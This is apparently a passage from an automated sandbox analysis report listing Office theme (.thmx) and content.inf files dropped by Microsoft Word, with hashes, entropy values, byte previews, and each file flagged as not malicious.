                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7896.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):276
                                                                                                                                                Entropy (8bit):3.5361139545278144
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                                                                                                                                MD5:133D126F0DE2CC4B29ECE38194983265
                                                                                                                                                SHA1:D8D701298D7949BE6235493925026ED405290D43
                                                                                                                                                SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                                                                                                                                SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7897.tmp\Banded.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):562113
                                                                                                                                                Entropy (8bit):7.67409707491542
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                                                MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                                                SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                                                SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                                                SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7897.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):278
                                                                                                                                                Entropy (8bit):3.535736910133401
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                                                                                                                                MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                                                                                                                                SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                                                                                                                                SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                                                                                                                                SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD78A8.tmp\Metropolitan.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):777647
                                                                                                                                                Entropy (8bit):7.689662652914981
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                                                MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                                                SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                                                SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                                                SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD78A8.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):290
                                                                                                                                                Entropy (8bit):3.5091498509646044
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                                                                                                                                MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                                                                                                                                SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                                                                                                                                SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                                                                                                                                SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD78B8.tmp\Dividend.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):570901
                                                                                                                                                Entropy (8bit):7.674434888248144
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                                                MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                                                SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                                                SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                                                SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD78B8.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):282
                                                                                                                                                Entropy (8bit):3.5459495297497368
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                                                                                                                                MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                                                                                                                                SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                                                                                                                                SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                                                                                                                                SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD78F8.tmp\Quotable.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):966946
                                                                                                                                                Entropy (8bit):7.8785200658952
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                                                MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                                                SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                                                SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                                                SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD78F8.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):282
                                                                                                                                                Entropy (8bit):3.5323495192404475
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                                                                                                                                MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                                                                                                                                SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                                                                                                                                SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                                                                                                                                SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7909.tmp\Frame.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):523048
                                                                                                                                                Entropy (8bit):7.715248170753013
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                                                MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                                                SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                                                SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                                                SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7909.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):276
                                                                                                                                                Entropy (8bit):3.5159096381406645
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                                                                                                                                MD5:71CCB69AF8DD9821F463270FB8CBB285
                                                                                                                                                SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                                                                                                                                SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                                                                                                                                SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD791A.tmp\Circuit.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1463634
                                                                                                                                                Entropy (8bit):7.898382456989258
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                                                MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                                                SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                                                SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                                                SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD791A.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):280
                                                                                                                                                Entropy (8bit):3.5286004619027067
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                                                                                                                                MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                                                                                                                                SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                                                                                                                                SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                                                                                                                                SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD791B.tmp\Wood_Type.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1649585
                                                                                                                                                Entropy (8bit):7.875240099125746
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                                                MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                                                SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                                                SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                                                SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD791B.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):284
                                                                                                                                                Entropy (8bit):3.5552837910707304
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                                                                                                                                MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                                                                                                                                SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                                                                                                                                SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
